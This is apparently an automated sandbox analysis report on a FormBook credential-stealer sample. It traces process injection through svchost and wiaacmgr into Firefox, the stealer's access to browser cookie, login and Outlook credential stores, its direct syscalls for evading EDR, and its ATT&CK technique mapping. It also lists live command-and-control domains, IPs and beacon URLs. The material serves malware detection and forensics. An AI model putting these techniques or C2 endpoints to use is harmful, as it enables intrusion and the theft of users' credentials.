                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtClose: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtUnmapViewOfSection: Direct from: 0x76F02D3C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\wiaacmgr.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Section loaded: NULL target: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe protection: read write
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Section loaded: NULL target: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Thread register set: target process: 4488
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Thread APC queued: target process: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 93A008
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00941201
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00922BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00922BA5
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0094B226 SendInput,keybd_event, 0_2_0094B226
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_009622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_009622DA
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\3HnH4uJtE7.exe"
                Source: C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe Process created: C:\Windows\SysWOW64\wiaacmgr.exe "C:\Windows\SysWOW64\wiaacmgr.exe"
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00940B62
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00941663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00941663
                Source: 3HnH4uJtE7.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: 3HnH4uJtE7.exe, wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: wdFhguqpcrad.exe, 00000003.00000000.1885834874.0000000001A21000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000003.00000002.3560720383.0000000001A20000.00000002.00000001.00040000.00000000.sdmp, wdFhguqpcrad.exe, 00000007.00000000.2027924118.0000000001880000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00900698 cpuid 0_2_00900698
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00958195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00958195
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0093D27A GetUserNameW, 0_2_0093D27A
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_0091BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_0091BB6F
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008E42DE

                Stealing of Sensitive Information

                Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\wiaacmgr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\wiaacmgr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
                Source: 3HnH4uJtE7.exe Binary or memory string: WIN_81
                Source: 3HnH4uJtE7.exe Binary or memory string: WIN_XP
                Source: 3HnH4uJtE7.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: 3HnH4uJtE7.exe Binary or memory string: WIN_XPe
                Source: 3HnH4uJtE7.exe Binary or memory string: WIN_VISTA
                Source: 3HnH4uJtE7.exe Binary or memory string: WIN_7
                Source: 3HnH4uJtE7.exe Binary or memory string: WIN_8

                Remote Access Functionality

                Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1962969685.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1962529025.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000001.00000002.1963457204.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00961204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00961204
                Source: C:\Users\user\Desktop\3HnH4uJtE7.exe Code function: 0_2_00961806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00961806

                MITRE ATT&CK Matrix (techniques followed by a number in parentheses are the ones matched by the analysis, with the count as reported)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (412)
                Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (241); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1587863
                Sample: 3HnH4uJtE7.exe
                Startdate: 10/01/2025
                Architecture: WINDOWS
                Score: 100

                Start (node 2)
                  DNS/IP: www.startsomething.xyz (28); www.juewucangku.xyz (30); 14 other IPs or domains (32)
                  Signatures: Suricata IDS alerts for network traffic (42); Multi AV Scanner detection for submitted file (44); Yara detected FormBook (46); 3 other signatures (50)
                  Signature on www.juewucangku.xyz (30): Performs DNS queries to domains with low reputation (48)
                  -> 3HnH4uJtE7.exe 2 (10) started

                Process 3HnH4uJtE7.exe (node 10)
                  Signatures: Binary is likely a compiled AutoIt script file (62); Found API chain indicative of sandbox detection (64); Writes to foreign memory regions (66); 2 other signatures (68)
                  -> svchost.exe (13) started

                Process svchost.exe (node 13)
                  Signatures: Maps a DLL or memory area into another process (70)
                  -> wdFhguqpcrad.exe (16) injected

                Process wdFhguqpcrad.exe (node 16)
                  Signatures: Found direct / indirect Syscall (likely to bypass EDR) (40)
                  -> wiaacmgr.exe 13 (19) started

                Process wiaacmgr.exe (node 19)
                  Signatures: Tries to steal Mail credentials (via file / registry access) (52); Tries to harvest and steal browser information (history, passwords, etc) (54); Modifies the context of a thread in another process (thread injection) (56); 3 other signatures (58)
                  -> wdFhguqpcrad.exe (22) injected; firefox.exe (26) started

                Process wdFhguqpcrad.exe (node 22)
                  DNS/IP: www.startsomething.xyz 69.57.163.64, 50019, 50020, 50021 FORTRESSITXUS United States (34); 187370.github.io 185.199.109.153, 49737, 49745, 49763 FASTLYUS Netherlands (36); 9 other IPs or domains (38)
                  Signatures: Found direct / indirect Syscall (likely to bypass EDR) (60)

Source | Detection | Scanner | Label
3HnH4uJtE7.exe | 69% | Virustotal |
3HnH4uJtE7.exe | 79% | ReversingLabs | Win32.Trojan.AutoitInject
3HnH4uJtE7.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://www.ausyva4.top/al74/ | 0% | Avira URL Cloud | safe
http://www.969-usedcar02.shop/cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXX | 0% | Avira URL Cloud | safe
http://www.opro.vip/3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXX | 0% | Avira URL Cloud | safe
http://santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGD | 0% | Avira URL Cloud | safe
http://www.goldbracelet.top/3e00/?Ol=yN0LtN-HDTPXX&3h=vcWi2Nuzfs8bFUYHM3WHAx3tRht2hRDvXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhn1cqd0Bfa9GTR6+v7wltgiOCNeedM3Uw1s= | 0% | Avira URL Cloud | safe
http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&amp;3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E | 0% | Avira URL Cloud | safe
http://www.startsomething.xyz/9er8/?3h=y0ZQaQGYytoPYKDe8bY9jaat1pADepFe7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaVhngwU9AnEVouJjO4g3krxQAVkSYZ/9aI0=&Ol=yN0LtN-HDTPXX | 0% | Avira URL Cloud | safe
http://www.969-usedcar02.shop/cfcv/ | 0% | Avira URL Cloud | safe
https://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC | 0% | Avira URL Cloud | safe
http://www.esnafus.online/xmwd/?Ol=yN0LtN-HDTPXX&3h=IE+rnmKnemgDtsiA8D5STAXs+nTDk69pr8eDsUHYy7apDPgh9p40v/i3nAWVLY2hDfLFviaUsm8qLT6zg1+OTK9FmT+L4AChwwgp3/M3yzjoJwJ2lNnYZDs= | 0% | Avira URL Cloud | safe
http://www.ausyva4.top/al74/?Ol=yN0LtN-HDTPXX&3h=1Bjse4aauCmo97N4UzKD0aR8m36fCMVAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/QA/O7XoGzbwB5f8pjnqeubu12DlOLexf3g= | 0% | Avira URL Cloud | safe
http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9 | 0% | Avira URL Cloud | safe
http://www.sssvip2.shop/cf1q/ | 0% | Avira URL Cloud | safe
http://www.shipley.group | 0% | Avira URL Cloud | safe
http://www.pku-cs-cjw.top/k3hn/ | 0% | Avira URL Cloud | safe
http://www.startsomething.xyz/9er8/ | 0% | Avira URL Cloud | safe
http://www.juewucangku.xyz/b6bc/ | 0% | Avira URL Cloud | safe
http://www.juewucangku.xyz/b6bc/?3h=xoBYbUYuit1npWAzc9zxgzbhPQqmOl0jRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0sm5GF01YtOiDz9nk9gyiJeQf3o0kWy0t0k=&Ol=yN0LtN-HDTPXX | 0% | Avira URL Cloud | safe
http://www.sssvip2.shop/cf1q/?3h=Au7Zxr9sERBgSOyq6sWX0Xm+S784fSZRk7JANtZrtFINqgeh5LGBoKKy7i8WIDLxVDqalClkjREz1X29sb2m/qDZ/T0gendGAmanUDy32Npyhfc7xsZS61c=&Ol=yN0LtN-HDTPXX | 0% | Avira URL Cloud | safe
http://www.opro.vip/3oq9/ | 0% | Avira URL Cloud | safe
http://www.shipley.group/5g1j/?3h=Iw562B7TPAI32gTWbsa7SZB9B1g4T8AuAaaNtg53EDLPQ9knn4W1dXgxSIR1GiDQ5ebaMc+5dfd+z2pa5yiwp35RXETqktnTD0YqfDOBtHcvCUTPdpJ9O6Q=&Ol=yN0LtN-HDTPXX | 0% | Avira URL Cloud | safe
http://www.santillo.bet/v9ah/?3h=yC3bXnyDZ4yqdl1qCLuqI8XvPsLlvIGaS84o6k5LK0tOudOrulJf3tgJD9KHnC2w/BXUgGDboXn9a2b9lFH1yxqNYPuRfPrUawe2VwTEtds8itq/kxdhNfk=&Ol=yN0LtN-HDTPXX | 0% | Avira URL Cloud | safe
http://www.santillo.bet/v9ah/ | 0% | Avira URL Cloud | safe
http://www.esnafus.online/xmwd/ | 0% | Avira URL Cloud | safe
http://www.shipley.group/5g1j/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.969-usedcar02.shop | 199.59.243.228 | true | true | | unknown
www.goldbracelet.top | 104.21.36.239 | true | false | | unknown
www.shipley.group | 13.248.169.48 | true | true | | unknown
www.ausyva4.top | 104.21.48.233 | true | true | | unknown
overdue.aliyun.com | 170.33.13.246 | true | false | | high
187370.github.io | 185.199.109.153 | true | true | | unknown
www.juewucangku.xyz | 8.136.96.106 | true | true | | unknown
www.sssvip2.shop | 156.253.8.115 | true | true | | unknown
santillo.bet | 66.235.200.145 | true | true | | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
www.startsomething.xyz | 69.57.163.64 | true | true | | unknown
www.esnafus.online | unknown | unknown | false | | unknown
www.santillo.bet | unknown | unknown | false | | unknown
www.pku-cs-cjw.top | unknown | unknown | false | | unknown
www.opro.vip | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.ausyva4.top/al74/ | true | Avira URL Cloud: safe | unknown
http://www.969-usedcar02.shop/cfcv/?3h=yFDcd28s49uqEHKqlww2Cwyic4spmP25HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RH93IVoJN7NWkPDeisF5hKGdeLzaAp6KdnI=&Ol=yN0LtN-HDTPXX | true | Avira URL Cloud: safe | unknown
http://www.opro.vip/3oq9/?3h=2MJNacGdKZTNHNzWrRqovynOPBr8E/IdeLZZPQlvVcFfWk0fi2yrHAqCm0wTlbN3Ra2bNNLNNGmcvIo8esHm09siwkoQohFpIo7lKjiy8KvUx5E5SY/z4nc=&Ol=yN0LtN-HDTPXX | true | Avira URL Cloud: safe | unknown
http://www.969-usedcar02.shop/cfcv/ | true | Avira URL Cloud: safe | unknown
